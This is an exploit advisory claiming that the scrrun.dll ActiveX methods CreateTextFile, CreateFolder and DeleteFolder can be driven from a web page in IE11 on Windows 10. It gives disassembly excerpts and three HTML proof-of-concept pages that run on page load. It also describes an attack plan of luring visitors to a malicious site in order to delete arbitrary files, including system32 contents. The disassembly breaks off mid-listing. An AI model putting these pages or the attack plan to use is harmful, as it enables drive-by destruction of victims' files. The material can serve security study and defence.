Microsoft Windows 10 scrrun.dll Active-X Creation / Deletion Issues Exploit

2018-06-08
ID: 98302
CVE: None
Download vulnerable application: None
# Title: Windows 10 'scrrun.dll' Multiple vulnerabilities
# Author: Nassim Asrir
# Contact: [email protected] / https://www.linkedin.com/in/nassim-asrir-b73a57122/
# Vendor: https://www.microsoft.com/
 Test ENV:
========
 Browser : IE 11 
 OS: Windows 10 - x64
 Details:
========
 scrrun.dll (C:\Windows\SysWOW64\scrrun.dll) contains 3 vulnerable functions.
 1 - CreateTextFile: With this function the attacker will be able to create text files on the victim machine
 2 - CreateFolder: With this function the attacker will be able to create folders on the victim machine
 3 - DeleteFolder: And with this the attacker will be able to delete any file system on victim machine like ( bootvid.dll ) or any file or folder on system32
 Attack scenario
===============
 The attacker will not need to use a MITM attack or Social engineering So as a scenario:
  1 - The attacker will create a website and he will inject the exploit code on his file (index.php) and if the victime navigate his website he will be affected with malicious code.
 2 - The attacker will be able to target big organization because this dll is installed by default on Windows so any Windows OS is affected .
 3 - The attacker will be able to affect lots of people by sharing his link via Any social website or in chat room.
 Impact:
=====
 So as i said first there a vulnerable function named  'DeleteFolder' and using this function the attacker will be able to delete any file or folder on victime machine and if the attacker targeted intersting files in system32 folder the victime will loss his machine.
 Exploits:
=========
 1- CreateTextFile function
==========================
 ; Attributes: bp-based frame
 ; int __stdcall CFileSystem__CreateTextFile(int, BSTR, int, unsigned __int16 *, __int16)
[email protected]@@[email protected]@@Z proc near
 var_110= dword ptr -110h
Memory= dword ptr -10Ch
var_108= byte ptr -108h
var_4= dword ptr -4
arg_4= dword ptr  0Ch
arg_8= dword ptr  10h
arg_C= dword ptr  14h
arg_10= word ptr  18h
 ; FUNCTION CHUNK AT .text:1000BF9D SIZE 0000005E BYTES
 mov     edi, edi
push    ebp
mov     ebp, esp
sub     esp, 110h
mov     eax, ___security_cookie
xor     eax, ebp
mov     [ebp+var_4], eax
push    esi
mov     esi, dword ptr [ebp+arg_10]
push    edi
mov     edi, [ebp+arg_4]
test    esi, esi
jz      short loc_10009700
 Note: I used the 'onload Event' to work the exploit automatically.
 This function contain 3 args and the attacker will be able to control the value:
 Function CreateTextFile (
     ByVal FileName  As String ,
     ByVal Overwrite  As Boolean ,
     ByVal Unicode  As Boolean
) 
 in our poc we controlled the FileName Parameter.
 <title>scrrun.dll Multiple Vulnerabilities</title>
<BODY onload=exploit()>
 <object id=rce classid="clsid:{0D43FE01-F093-11CF-8940-00A0C9054228}"></object>
  <SCRIPT>
  function exploit()
 {
           rce.CreateTextFile("C:\\Users\\ZS-002\\Desktop\\test.txt")
          }
  </SCRIPT>
</body>
</body>
</HTML>
 2- CreateFolder Function:
=========================
 ; Attributes: bp-based frame
 ; int __fastcall DoCreateFolder(LPCWSTR lpPathName)
[email protected]@[email protected]@@Z proc near
 var_4= byte ptr -4
 mov     edi, edi
push    ebp
mov     ebp, esp
push    ecx
push    esi
push    edi
mov     edi, edx
mov     esi, ecx
call    [email protected]@[email protected] ; IsUNC(ushort const *)
test    eax, eax
jz      short loc_1001AB21
 This function contain one paramter and also the attacker will be able to control it.
  Function CreateFolder (
     ByVal Path  As String
)  As IFolder
  This exploit will create a folder named 'test' on Desktop.
 <title>scrrun.dll Multiple Vulnerabilities</title>
<BODY onload=exploit()>
 <object id=rce classid="clsid:{0D43FE01-F093-11CF-8940-00A0C9054228}"></object>
  <SCRIPT>
  function exploit()
 {
           rce.CreateFolder("C:\\Users\\ZS-002\\Desktop\\test")
          }
  </SCRIPT>
</body>
</body>
</HTML>
 3- DeleteFolder function
========================
 .text:1001AC24
.text:1001AC24 ; Attributes: bp-based frame
.text:1001AC24
.text:1001AC24 ; int __fastcall DoDeleteFolder(wchar_t *Src)
.text:1001AC24 [email protected]@[email protected] proc near    ; CODE XREF: CFileSystem::DeleteFolder(ushort *,short)+3Ap
.text:1001AC24                                         ; FolderObject::Delete(short)+2Fp
.text:1001AC24
.text:1001AC24 var_488         = byte ptr -488h
.text:1001AC24 var_484         = dword ptr -484h
.text:1001AC24 var_480         = dword ptr -480h
.text:1001AC24 var_474         = dword ptr -474h
.text:1001AC24 var_470         = dword ptr -470h
.text:1001AC24 Memory          = dword ptr -46Ch
.text:1001AC24 var_468         = byte ptr -468h
.text:1001AC24 var_260         = dword ptr -260h
.text:1001AC24 var_25C         = dword ptr -25Ch
.text:1001AC24 var_258         = dword ptr -258h
.text:1001AC24 var_4           = dword ptr -4
.text:1001AC24
.text:1001AC24                 mov     edi, edi
.text:1001AC26                 push    ebp
.text:1001AC27                 mov     ebp, esp
.text:1001AC29                 sub     esp, 488h
.text:1001AC2F                 mov     eax, ___security_cookie
.text:1001AC34                 xor     eax, ebp
.text:1001AC36                 mov     [ebp+var_4], eax
.text:1001AC39                 push    ebx
.text:1001AC3A                 mov     [ebp+var_484], edx
.text:1001AC40                 mov     ebx, ecx
.text:1001AC42                 push    edi
.text:1001AC43                 lea     edx, [ebp+var_488]
.text:1001AC49                 call    [email protected]@[email protected] ; GetNameSubstring(ushort const *,int *)
.text:1001AC4E                 mov     edi, eax
.text:1001AC50                 test    edi, edi
.text:1001AC52            
 This function is the dangerous function with this exploit the attacker will be able to delete any file or folder on victim machine also on system32 folder.
  This exploit will delete a folder named test
 <title>scrrun.dll Multiple Vulnerabilities</title>
<BODY onload=exploit()>
 <object id=rce classid="clsid:{0D43FE01-F093-11CF-8940-00A0C9054228}"></object>
  <SCRIPT>
  function exploit()
 {
           rce.DeleteFolder("C:\\Users\\ZS-002\\Desktop\\test")
          }
  </SCRIPT>
</body>
</body>
</HTML>
 #EOF and thnks for reading my report.
1-4-2 (www02)